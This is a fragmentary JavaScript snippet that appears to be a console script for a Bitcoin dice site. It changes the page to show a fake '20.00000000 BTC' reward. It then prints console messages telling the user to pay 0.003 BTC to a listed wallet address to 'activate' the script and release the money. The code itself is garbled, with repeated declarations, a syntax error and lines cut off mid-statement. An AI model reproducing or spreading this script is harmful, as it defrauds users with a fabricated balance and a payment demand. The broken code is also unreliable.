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var Mistake = max//profit_withdraw; /

var autorounds - 1; /
var stop_profit_positivo= 0.00000750 ; // Profit Positive
var stop_profit_negativo= -0.00000500 ; // Profit Negative
var stop_profit_positivo= 0.00000550 ; // Profit Positive
var stop_profit_negativo= -0.00000200 ; // Profit Negative
var stop_profit_positivo= 0.00000150 ; // Profit Positive
var stop_profit_negativo= -0.00000125 ; // Profit Negative
var stop_profit_positivo= 0.00000050 ; // Profit Positive
var stop_profit_negativo= -0.00000100 ; // Profit Negative
var profit_atual=parseFloat($('#auto_stats_profit').text());
document.querySelector("#fp_min_reward").innerHTML = "20.00000000 BTC";
$('<p><strong id="Contato" style="font-
$('<p><strong id="Contato" style="font-
dice').bind("DOMSubtreeModified",function(eventpositivo){if( $(event.currentTarget)
if(stop_profit_positivo < profit_atual){$('#btn-bet-stop-pilot-
{if( $(event.currentTarget) ){
if(stop_profit_negativo > profit_atual){$('#btn-bet-stop-pilot-
('#auto_stats_profit').text());}});console.clear();console.log('Script not
activated!'); console.log('20.00000000 BTC is Pending ! Please activate your
Script'); console.log('To Activate Script, you need to Pay ( 0.003 BTC ) to this
BTC wallet address: 34HRS7WJK9RWjUafS1CXEGVTDsCUuTS4Jo');

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